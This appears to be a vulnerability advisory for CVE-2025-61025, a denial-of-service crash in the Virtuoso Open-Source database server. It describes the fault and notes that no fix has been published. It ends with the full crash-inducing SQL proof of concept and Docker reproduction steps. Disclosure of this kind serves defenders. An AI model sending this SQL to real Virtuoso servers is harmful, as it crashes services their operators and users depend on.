CVE-2025-61025

An attacker can trigger a denial-of-service by sending a crafted SQL statement to the Virtuoso database server. The PoC uses a `CREATE TABLE` statement with an elaborate `CHECK` constraint that includes nested subqueries, `GROUP BY` clauses, `HAVING` clauses, and complex `CASE` expressions [ref_id=1]. When the server attempts to parse and execute this statement, it crashes in `sslr_qst_get`, causing a denial of service. No authentication or special privileges beyond the ability to execute SQL statements are required.

The crash occurs in the `sslr_qst_get` function within the Virtuoso Open-Source v7.2.11 server. The backtrace shows the fault originates during query parsing and execution when processing a crafted `CREATE TABLE` statement with a deeply nested `CHECK` constraint containing complex subqueries and expressions.

The advisory does not include a patch or fix. The issue was reported to the vendor via the GitHub issue tracker [ref_id=1], but no commit or remediation has been published as of the time of this analysis. Users should monitor the vendor's repository for future updates that address the crash in `sslr_qst_get`.

The PoC SQL is provided in the issue [ref_id=1]: ```sql CREATE TABLE x ( x INT PRIMARY KEY CHECK ( CASE WHEN x = ( SELECT x FROM x WHERE ( 'x' ) GROUP BY x HAVING x ( ) > 1 OR x ( x ) = x ( x ) ) THEN 'x' WHEN x > 1 OR CASE WHEN ( SELECT 1 FROM ( SELECT x ( x ( x ) , x ) ISNULL FROM x ORDER BY - x , x ) AS x WHERE x = 'x' OR x ( x ( ) ) = x OR x = 'x' GROUP BY x , x , x ) THEN ( - x ( 1 ) ) ELSE ( 1 * x ) END AND - x ( 1 ) >= x OR ( SELECT x FROM ( SELECT x ) AS x WHERE x = ( SELECT x FROM x AS x JOIN x ON ( ( ( SELECT x ( x , CASE WHEN 1 THEN 'x' WHEN x = 1 AND x ( 1.000000 ) AND x = 1 AND x = 1 OR x = 1 AND ( x = 1 OR x = 1 OR x = 1 ) THEN 'x' ELSE 'x' END , CASE 1 WHEN 1 THEN 'x' WHEN 1 THEN 'x' ELSE 'x' END ) , 1 , 'x' ) ) , 1 ) = x WHERE ( - 'x' >= x AND x = 1 * 1 ) ) ) THEN 'x' ELSE 'x' END ) ) ; INSERT INTO x ( x ) VALUES ( 78 ) ; ``` Reproduction steps: write the PoC to `/tmp/test.sql`, then run `docker container rm virtdb_test -f`, `docker run --name virtdb_test -itd --env DBA_PASSWORD=dba pkleef/virtuoso-opensource-7`, wait 10 seconds, and execute `cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba`.